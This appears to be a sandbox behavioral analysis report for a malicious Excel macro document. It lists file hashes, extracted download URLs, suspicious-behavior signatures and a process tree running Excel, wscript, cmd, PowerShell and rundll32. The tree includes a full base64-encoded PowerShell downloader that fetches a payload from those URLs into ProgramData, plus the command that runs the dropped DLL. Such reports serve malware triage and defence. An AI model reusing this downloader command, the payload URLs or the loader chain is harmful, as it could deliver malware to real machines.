Analysis
-
max time kernel
47s -
max time network
36s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
20-11-2024 21:11
Behavioral task
behavioral1
Sample
986a28cc6b6165931375401925849e4182df92e8468fadfca7695d70f49a8213.xls
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
986a28cc6b6165931375401925849e4182df92e8468fadfca7695d70f49a8213.xls
Resource
win10v2004-20241007-en
General
-
Target
986a28cc6b6165931375401925849e4182df92e8468fadfca7695d70f49a8213.xls
-
Size
122KB
-
MD5
2136126af329fdbbe2daa91c818cf987
-
SHA1
dea8921d1758aacb5a55d804280a8f0f089278ff
-
SHA256
986a28cc6b6165931375401925849e4182df92e8468fadfca7695d70f49a8213
-
SHA512
2d264fa369b07ab69c8843502b1e6adaf2a8dfd4f85cafb6f58893761895bf6546e25729d5e6a149b3787f3cc4f0c22e82867c1468223d8944757dd4ab585d4d
-
SSDEEP
3072:YOehv7q2Pjx45uoDGTj+5xtekEvi8/dgZBFoTLTmxW5WxVe+41WsdiXUchlL:xehv7q2Pjx45uoDGTj+5xtFEvi8/dgZ3
Malware Config
Extracted
http://midnightsilvercrafters.com/store/wBjNOUw/
http://tempral.com/NATE_05_22_2009/BI710N4cQ6R3/
https://redington.karmatechmediaworks.com/wp-content/3JVuVx7QUM/
https://uhc.karmatechmediaworks.com/wp-content/0EqfdeznntlOpaIP2Qv/
https://servilogic.net/b/14hqrdyP0Z3WsbQib8/
https://comezmuhendislik.com/ljfrmm/VTpHRFWoORAHnRQ3aQL/
http://webmail.glemedical.com/wp-content/J1M2xxodH/
http://toto.karmatechmediaworks.com/wp-content/i826vbcVgRJ/
https://golfpia.karmatechmediaworks.com/wp-content/oEicpDnEkk/
https://fortiuspharma.com/y6krss/EGm347cqj5/
https://garyjharris.com/cgi-bin/0hH/
https://vietnam.karmatechmediaworks.com/wp-content/PfSVQagusZy7AaMw/
https://vinculinc.karmatechmediaworks.com/wp-content/VlcOPPwgidWlXDJNs6/
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
wscript.exedescription pid pid_target process target process Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 2924 3772 wscript.exe EXCEL.EXE -
Blocklisted process makes network request 5 IoCs
Processes:
powershell.exeflow pid process 12 1912 powershell.exe 26 1912 powershell.exe 32 1912 powershell.exe 35 1912 powershell.exe 44 1912 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
wscript.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation wscript.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
rundll32.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rundll32.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
EXCEL.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString EXCEL.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
EXCEL.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU EXCEL.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
EXCEL.EXEpid process 3772 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
powershell.exepid process 1912 powershell.exe 1912 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 1912 powershell.exe -
Suspicious use of SetWindowsHookEx 12 IoCs
Processes:
EXCEL.EXEpid process 3772 EXCEL.EXE 3772 EXCEL.EXE 3772 EXCEL.EXE 3772 EXCEL.EXE 3772 EXCEL.EXE 3772 EXCEL.EXE 3772 EXCEL.EXE 3772 EXCEL.EXE 3772 EXCEL.EXE 3772 EXCEL.EXE 3772 EXCEL.EXE 3772 EXCEL.EXE -
Suspicious use of WriteProcessMemory 11 IoCs
Processes:
EXCEL.EXEwscript.execmd.execmd.exedescription pid process target process PID 3772 wrote to memory of 2924 3772 EXCEL.EXE wscript.exe PID 3772 wrote to memory of 2924 3772 EXCEL.EXE wscript.exe PID 2924 wrote to memory of 2444 2924 wscript.exe cmd.exe PID 2924 wrote to memory of 2444 2924 wscript.exe cmd.exe PID 2444 wrote to memory of 1912 2444 cmd.exe powershell.exe PID 2444 wrote to memory of 1912 2444 cmd.exe powershell.exe PID 2924 wrote to memory of 2184 2924 wscript.exe cmd.exe PID 2924 wrote to memory of 2184 2924 wscript.exe cmd.exe PID 2184 wrote to memory of 1140 2184 cmd.exe rundll32.exe PID 2184 wrote to memory of 1140 2184 cmd.exe rundll32.exe PID 2184 wrote to memory of 1140 2184 cmd.exe rundll32.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\986a28cc6b6165931375401925849e4182df92e8468fadfca7695d70f49a8213.xls"1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3772 -
C:\Windows\SYSTEM32\wscript.exewscript c:\programdata\oue4hjld.vbs2⤵
- Process spawned unexpected child process
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2924 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\programdata\bhnasleil.bat" "3⤵
- Suspicious use of WriteProcessMemory
PID:2444 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -enc JABNAEoAWABkAGYAcwBoAEQAcgBmAEcAWgBzAGUAcwA0AD0AIgBoAHQAdABwADoALwAvAG0AaQBkAG4AaQBnAGgAdABzAGkAbAB2AGUAcgBjAHIAYQBmAHQAZQByAHMALgBjAG8AbQAvAHMAdABvAHIAZQAvAHcAQgBqAE4ATwBVAHcALwAsAGgAdAB0AHAAOgAvAC8AdABlAG0AcAByAGEAbAAuAGMAbwBtAC8ATgBBAFQARQBfADAANQBfADIAMgBfADIAMAAwADkALwBCAEkANwAxADAATgA0AGMAUQA2AFIAMwAvACwAaAB0AHQAcABzADoALwAvAHIAZQBkAGkAbgBnAHQAbwBuAC4AawBhAHIAbQBhAHQAZQBjAGgAbQBlAGQAaQBhAHcAbwByAGsAcwAuAGMAbwBtAC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvADMASgBWAHUAVgB4ADcAUQBVAE0ALwAsAGgAdAB0AHAAcwA6AC8ALwB1AGgAYwAuAGsAYQByAG0AYQB0AGUAYwBoAG0AZQBkAGkAYQB3AG8AcgBrAHMALgBjAG8AbQAvAHcAcAAtAGMAbwBuAHQAZQBuAHQALwAwAEUAcQBmAGQAZQB6AG4AbgB0AGwATwBwAGEASQBQADIAUQB2AC8ALABoAHQAdABwAHMAOgAvAC8AcwBlAHIAdgBpAGwAbwBnAGkAYwAuAG4AZQB0AC8AYgAvADEANABoAHEAcgBkAHkAUAAwAFoAMwBXAHMAYgBRAGkAYgA4AC8ALABoAHQAdABwAHMAOgAvAC8AYwBvAG0AZQB6AG0AdQBoAGUAbgBkAGkAcwBsAGkAawAuAGMAbwBtAC8AbABqAGYAcgBtAG0ALwBWAFQAcABIAFIARgBXAG8ATwBSAEEASABuAFIAUQAzAGEAUQBMAC8ALABoAHQAdABwADoALwAvAHcAZQBiAG0AYQBpAGwALgBnAGwAZQBtAGUAZABpAGMAYQBsAC4AYwBvAG0ALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8ASgAxAE0AMgB4AHgAbwBkAEgALwAsAGgAdAB0AHAAOgAvAC8AdABvAHQAbwAuAGsAYQByAG0AYQB0AGUAYwBoAG0AZQBkAGkAYQB3AG8AcgBrAHMALgBjAG8AbQAvAHcAcAAtAGMAbwBuAHQAZQBuAHQALwBpADgAMgA2AHYAYgBjAFYAZwBSAEoALwAsAGgAdAB0AHAAcwA6AC8ALwBnAG8AbABmAHAAaQBhAC4AawBhAHIAbQBhAHQAZQBjAGgAbQBlAGQAaQBhAHcAbwByAGsAcwAuAGMAbwBtAC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvAG8ARQBpAGMAcABEAG4ARQBrAGsALwAsAGgAdAB0AHAAcwA6AC8ALwBmAG8AcgB0AGkAdQBzAHAAaABhAHIAbQBhAC4AYwBvAG0ALwB5ADYAawByAHMAcwAvAEUARwBtADMANAA3AGMAcQBqADUALwAsAGgAdAB0AHAAcwA6AC8ALwBnAGEAcgB5AGoAaABhAHIAcgBpAHMALgBjAG8AbQAvAGMAZwBpAC0AYgBpAG4ALwAwAGgASAAvACwAaAB0AHQAcABzADoALwAvAHYAaQBlAHQAbgBhAG0ALgBrAGEAcgBtAGEAdABlAGMAaABtAGUAZABpAGEAdwBvAHIAawBzAC4AYwBvAG0ALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8AUABmAFMAVgBRAGEAZwB1AHMAWgB5ADcAQQBhAE0AdwAvACwAaAB0AHQAcABzADoALwAvAHYAaQBuAGMAdQBsAGkAbgBjAC4AawBhAHIAbQBhAHQAZQBjAGgAbQBlAGQAaQBhAHcAbwByAGsAcwAuAGMAbwBtAC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvAFYAbABjAE8AUABQAHcAZwBpAGQAVwBsAFgARABKAE4AcwA2AC8AIgAuAHMAUABMAEkAdAAoACIALAAiACkAOwAgAGYAbwBSAGUAQQBDAGgAKAAkAHkASQBkAHMAUgBoAHkAZQAzADQAcwB5AHUAZgBnAHgAagBjAGQAZgAgAGkATgAgACQATQBKAFgAZABmAHMAaABEAHIAZgBHAFoAcwBlAHMANAApAHsAJABHAHcAZQBZAEgANQA3AHMAZQBkAHMAdwBkAD0AKAAiAGMAaQB1AHcAZAA6AGkAdQB3AGQAXABwAHIAaQB1AHcAZABvAGcAaQB1AHcAZAByAGEAbQBpAHUAdwBkAGQAYQB0AGkAdQB3AGQAYQBcAHYAeABjAGoAawBmAGgAZAAuAGQAaQB1AHcAZABsAGkAdQB3AGQAbAAiACkALgByAGUAUABsAEEAQwBlACgAIgBpAHUAdwBkACIALAAiACIAKQA7AGkAbgBWAE8AawBlAC0AdwBlAEIAcgBFAHEAVQBlAHMAVAAgAC0AdQBSAEkAIAAkAHkASQBkAHMAUgBoAHkAZQAzADQAcwB5AHUAZgBnAHgAagBjAGQAZgAgAC0AbwBVAHQARgBJAGwAZQAgACQARwB3AGUAWQBIADUANwBzAGUAZABzAHcAZAA7AGkARgAoAHQAZQBTAHQALQBwAEEAVABoACAAJABHAHcAZQBZAEgANQA3AHMAZQBkAHMAdwBkACkAewBpAGYAKAAoAGcARQB0AC0AaQB0AEUAbQAgACQARwB3AGUAWQBIADUANwBzAGUAZABzAHcAZAApAC4AbABlAE4ARwB0AGgAIAAtAGcAZQAgADQANwA0ADMANgApAHsAYgBSAGUAYQBrADsAfQB9AH0A4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1912
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c start /B c:\windows\syswow64\rundll32.exe c:\programdata\vxcjkfhd.dll,ganw4ls3⤵
- Suspicious use of WriteProcessMemory
PID:2184 -
\??\c:\windows\syswow64\rundll32.exec:\windows\syswow64\rundll32.exe c:\programdata\vxcjkfhd.dll,ganw4ls4⤵
- System Location Discovery: System Language Discovery
PID:1140
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms
Filesize1KB
MD5526f526f851c30c292426bd4cc5e368f
SHA19023b0c186d6864ce306fcce797d249513fd3e6b
SHA256737e55e0a612a9b1435022d45f2c73fd985e16f41d75ba6b43776796f028e8f4
SHA5126917054373ab4bc9ae68a7fb83a8dd006192f75dd5dfc7d2d13ac00f788c0985a3ae6fbe808b90b1c06dc1cf25bcb7db500ff7ad2439ca7dd3e6e846e8580523
-
Filesize
3KB
MD50f96848827a2960f874bcf613ce1e72c
SHA1d936a765910adaf627fc6459716847fd87595ea2
SHA2569e9915a1e009b7a9283629e5a1a66604915030b445c1f266914955299563473e
SHA51200f04d42d544c0564ca4d435fbc0803ebcd8eabaa45abc852b449beffb4f3701681b8c908f580640e71686255c83aa698f10ea75a51dd0bf76c177132e86b862
-
Filesize
604B
MD5a0e5c8b0ad3da42bf6952871a41bf5e8
SHA1cd2106ebaf43d596057457e87cf4c8482e246005
SHA2565c3d66e2d33dfb51c691010af5d0a87250aa475235b537a336c607ade93a881a
SHA512c685cc80c128087b6711ab65c7a0f2c63f55dfbab8577aea20d668112f77a0e69e7e350ff314201e93b8ef79f72764c79fc20e903c1a1f973e37ae3a873ff725